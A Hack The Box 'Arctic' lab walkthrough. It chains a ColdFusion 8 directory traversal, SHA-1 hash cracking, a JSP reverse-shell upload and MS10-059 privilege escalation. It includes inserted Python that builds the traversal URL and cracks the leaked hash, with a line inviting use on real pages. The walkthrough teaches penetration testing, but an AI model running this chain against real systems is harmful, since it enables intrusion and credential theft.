Ethical Hacking Lessons — Arctic Writeup

Kamran Bilgrami
8 min read, Nov 5, 2019


This write-up covers the Hack The Box Arctic machine. The box shows how weak password handling, on top of unpatched software, lets an adversary gain full control of a machine.

It is a Windows machine at 10.10.10.11. The HTB radar graph indicates that known CVEs play a part.

Recon

Let’s start active recon with the Nmap TCP scan.

nmap -A -T4 -p- -oX tcp_scan_results.xml 10.10.10.11

Below are the results produced by the scan.

The UDP scan did not finish, though.

Recon Results Analysis

Two Microsoft Windows RPC ports, 135 and 49154, are open. Port 8500 is also open; Nmap's best guess is that it is running an fmtp service, but that label comes from the port table (8500/tcp is the IANA assignment for FMTP) rather than from a banner match, so it should not be trusted until the service is looked at directly.

Enumeration

Let's start with the RPC services. I used rpcclient with the following switches to attempt a null session.

  • -U: Network user name
  • -N: This parameter suppresses the normal password prompt

I tried a few username/password combinations without any luck.

searchsploit for RPC returned a long list of exploits, but nothing specific to what was found here, and trying all of them would take a long time. Further googling also suggested that RPC services are not among the easiest to exploit, so I moved on to the next service to avoid a potential rabbit hole.

Googling FMTP suggested this may be the Flight Message Transfer Protocol. The searchsploit results for it do not look promising for our use case, where we need some type of RCE.

I then tried opening this port in the browser. It took somewhere between 20 and 25 seconds, but that led me to the following page.

So this is a web server after all. As the image above shows, it returned a directory listing with two folders. Clicking the CFIDE directory led to the following page, again after a 20–25 second wait.

The CFIDE listing contains an administrator folder, which could be interesting. Clicking on it leads to the ColdFusion Administrator login panel.

This page shows that it is running version 8 of ColdFusion.

Enumeration Analysis

We found that the box is running Adobe ColdFusion 8 on port 8500, which rules out the fmtp guess from the scan.

Exploitation

I tried a few common passwords on the ColdFusion administration panel, but none of them worked. I then used searchsploit to look for available exploits, which turned up a couple of interesting ones.

Let's start with the directory traversal exploit, EDB-ID 14641, which references CVE-2010-2861. The exploit's description also provides an example of how to trigger it, as shown below.

Using this example brings up the following page, which includes the contents of password.properties and with it a password hash.

Inspecting the page source shows that the login form applies an HMAC to the SHA-1 hash of the password before submitting it, so the value we leaked is the stored SHA-1 hash, not the plaintext.

Brute-forcing the login form is possible in principle, but with a 20–25 second delay on every request it does not look like a practical path. Since the hash is plain SHA-1 with no salt, I simply tried an online password cracking tool, which gave an immediate result. (For anything other than a lab box, crack offline: pasting hashes into a third-party site hands them to whoever runs it.)
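The two steps above, the traversal request and the offline hash check, as an added Python example that is not part of the original write-up. It builds the enter.cfm URL using the traversal path published in EDB-ID 14641 (the ColdFusion8 install directory and traversal depth are the exploit's defaults, assumed here), pulls the password line out of a leaked password.properties, runs a dictionary check against the unsalted SHA-1, and computes the HMAC the login page's JavaScript submits (the key/message order is an assumption). The sample page text and the salt are constructed for the demo; no network call is made.

```python
"""Added example for the Arctic write-up (not the author's code).

Reproduces the traversal URL from EDB-ID 14641 / CVE-2010-2861, parses the
leaked password.properties, and shows why the SHA-1 cracks instantly.
"""
import hashlib
import hmac
import re
from typing import Iterable, Optional
from urllib.parse import quote

TARGET = "10.10.10.11"  # from the write-up
PORT = 8500

# Traversal path as published in EDB-ID 14641; assumes a default
# C:\ColdFusion8 install, which is what the exploit entry assumes too.
PASSWORD_PROPERTIES = (
    "../../../../../../../../../../ColdFusion8/lib/password.properties"
)

# password.properties is echoed into the HTML, so match the line itself.
PASSWORD_RE = re.compile(r"password=([0-9A-Fa-f]{40})")


def traversal_url(host: str = TARGET, port: int = PORT,
                  path: str = PASSWORD_PROPERTIES) -> str:
    """enter.cfm URL with the traversal in the locale parameter.

    The %00 truncates the path on the server side, so the 'en' that follows
    (a normal-looking locale value) is ignored when the file is opened.
    """
    return (f"http://{host}:{port}/CFIDE/administrator/enter.cfm"
            f"?locale={quote(path, safe='/')}%00en")


def extract_hash(page: str) -> Optional[str]:
    """Return the 40-hex SHA-1 from a leaked password.properties, if present."""
    m = PASSWORD_RE.search(page)
    return m.group(1).upper() if m else None


def sha1_hex(word: str) -> str:
    """ColdFusion 8 stores the admin password as uppercase hex SHA-1."""
    return hashlib.sha1(word.encode()).hexdigest().upper()


def crack_sha1(target_hash: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: no salt means one hash per candidate.

    Returns the matching word, or None if nothing in the list matches.
    """
    target_hash = target_hash.upper()
    for word in candidates:
        if hmac.compare_digest(sha1_hex(word), target_hash):
            return word
    return None


def login_token(password_hash: str, salt: str) -> str:
    """Value the admin login form submits instead of the plaintext.

    The page's JavaScript computes hex_hmac_sha1(salt, hex_sha1(password));
    salt as HMAC key and the hash as message is the assumed order here.
    """
    return hmac.new(salt.encode(), password_hash.upper().encode(),
                    hashlib.sha1).hexdigest()


# Constructed stand-in for the page the traversal returns. The hash is
# generated here so the demo is self-contained; it is not the box's value.
SAMPLE_PAGE = (
    "<html><body>#Wed Mar 22 20:53:51 EET 2017\n"
    "rdspassword=\n"
    f"password={sha1_hex('happyday')}\n"
    "encrypted=true\n"
    "</body></html>"
)


def demo(wordlist: Iterable[str] = ("admin", "password", "happyday")):
    """Walk the whole chain on the constructed sample; returns (hash, word)."""
    leaked = extract_hash(SAMPLE_PAGE)
    return leaked, crack_sha1(leaked, wordlist) if leaked else None


if __name__ == "__main__":
    print("GET", traversal_url())
    leaked, word = demo()
    print("leaked hash:", leaked, "-> cracked:", word)
    print("form would send:", login_token(leaked, "constructed-salt"))
```

To use it against a real page, fetch `traversal_url()` with the tool of your choice, pass the response body to `extract_hash`, and feed a wordlist to `crack_sha1`; the timing problem the text describes disappears because only one request is needed.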

I tried admin/happyday as the username/password, and the login was successful, showing the following page.

This page offers a menu item for Scheduled Tasks. Clicking on that navigates to the following page.

If you click on the “Schedule New Task” button, it brings up the following page.

As you can see, this form has a field for a file path. A scheduled task fetches a URL and, when told to save its output to a file, writes the response to that path, so a path under the web root could let us plant a file on the server. We already saw that another identified exploit has something to do with arbitrary file upload. Let's get more information about it.

This Exploit-DB entry, EDB-ID 45979, points to CVE-2018-15951. Before spending time on any entry, check the affected versions in its header against what enumeration found (ColdFusion 8 here); an exploit written for a later release may simply not apply.

The obvious next step is to see if we can upload a reverse shell. The question is what type of reverse shell to use. The What is ColdFusion link explains that it is built on Java, so a JSP payload is the natural fit.

The good news is that msfvenom supports Java payloads, as shown below.

Let's create a payload in JSP format.

Of course, don't forget to start the listener on our attack machine on port 8888.

Now we can go back to the Scheduled Task page to create a new task.

After creating the task, we can run it from the following page, which should trigger the shell we uploaded.

However, this did not give me a shell. I tried all the JSP payload combinations I could think of and tried to run the file from the browser, but without any luck. So I went back to Google to look for other solutions.

I came across a Python script that uses CVE-2009-2265, a file upload flaw in the FCKeditor component bundled with ColdFusion 8, to upload an arbitrary file to the server. Let's use it to upload the same JSP payload. The script also prints the path where the file was uploaded, as shown below.

Our listener is still running, so now we just request the URL reported by the exploit:

http://10.10.10.11:8500/userfiles/file/exploit.jsp

After a short wait I got a shell. It was a low-privilege one, as shown in the image below.

And of course, don’t forget to get the user flag.

Priv Escalation

To grab the root flag, we need privilege escalation. Let's first gather more information with the systeminfo command.

As the image above shows, it is a Windows Server 2008 R2 box with no hotfixes installed. We can use the windows-exploit-suggester script to see which exploits might apply. Before running it, let's update it; the update command prints the name of the database file it downloaded.

Next, we run the script against the systeminfo output, which I saved locally as systeminfo.txt. It produced several suggestions, some with Metasploit modules and some without. Eventually, the exploit for MS10-059 worked.
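What windows-exploit-suggester does with that systeminfo.txt, as an added Python example that is not the author's code or the suggester's: parse the OS fields and the installed hotfix list out of systeminfo output, then report bulletins whose patch KB is missing on an affected product. The bulletin table holds only MS10-059, with its KB and affected product names taken from the bulletin; treat it as an assumption to extend from the real database. The two systeminfo samples are constructed for the demo.

```python
"""Added example for the Arctic write-up (not the author's code).

Minimal version of the windows-exploit-suggester check: systeminfo -> OS and
hotfix list -> bulletins whose KB is absent on an affected product.
"""
import re
from typing import Dict, List

# Bulletin -> patch KB and affected product name prefixes. Only the bulletin
# the write-up ends up using; assumed from its Microsoft advisory and meant
# to be replaced by the suggester's full database.
BULLETINS = {
    "MS10-059": {
        "kb": "KB982799",
        "products": ("Windows Vista", "Windows Server 2008", "Windows 7"),
    },
}

# systeminfo lists hotfixes as indented "[01]: KB982799" lines.
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Turn systeminfo output into a dict of fields plus a 'hotfixes' list.

    Only the first colon on a line separates key from value, so values such
    as '6.1.7601 Service Pack 1 Build 7601' survive intact.
    """
    info: Dict[str, object] = {"hotfixes": []}
    for line in text.splitlines():
        m = KB_RE.search(line)
        if m:
            info["hotfixes"].append(m.group(1))
            continue
        if ":" in line:
            key, _, value = line.partition(":")
            info[key.strip()] = value.strip()
    return info


def missing_patches(info: Dict[str, object],
                    bulletins: Dict[str, dict] = BULLETINS) -> List[str]:
    """Bulletins that apply to this OS and whose KB is not installed."""
    installed = set(info["hotfixes"])
    os_name = str(info.get("OS Name", ""))
    return [
        name for name, b in bulletins.items()
        if any(p in os_name for p in b["products"]) and b["kb"] not in installed
    ]


def summarize(text: str) -> Dict[str, object]:
    """One-call view: OS string, hotfix count and candidate bulletins."""
    info = parse_systeminfo(text)
    return {
        "os": f"{info.get('OS Name', '?')} {info.get('OS Version', '?')}",
        "hotfix_count": len(info["hotfixes"]),
        "missing": missing_patches(info),
    }


# Constructed samples in systeminfo's layout (not captured from the box).
SAMPLE_UNPATCHED = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

SAMPLE_PATCHED = """\
Host Name:                 PATCHED
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB976902
"""

if __name__ == "__main__":
    for sample in (SAMPLE_UNPATCHED, SAMPLE_PATCHED):
        print(summarize(sample))
```

Feed it the real systeminfo.txt with `summarize(open("systeminfo.txt").read())`; an empty hotfix list on a 2008 R2 host is exactly the signal that sent the write-up to MS10-059.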

A Google search led to a GitHub page offering a pre-compiled binary called Chimichurri that exploits MS10-059.

Of course, my browser was not happy about downloading a binary. It warned that the file could be a virus or malware.

I had to explicitly allow the download.

It goes without saying that such browser warnings should not be ignored. Be careful with any binary downloaded from the internet: run it only in a disposable lab VM, and build from source when the source is available.

Make sure that a web server is running on the attack machine to serve the binary.

We now need to get this binary onto the Arctic box. I used the certutil utility to download it.

The web server log on the attack machine confirmed the download.

We also need a listener on a different port. This time I started it on port 6666.

Let's run the downloaded binary on the victim Arctic box, giving it the IP address of the attack machine and the listening port.

That gave us a root-level (NT AUTHORITY\SYSTEM) shell.

We also got the root level flag.

Root Cause Analysis

A few issues on this box:

  • A weak dictionary password stored as an unsalted SHA-1 hash, which is trivially reversed once leaked
  • A version of ColdFusion with known, exploitable vulnerabilities
  • An operating system that was never patched and has known vulnerabilities
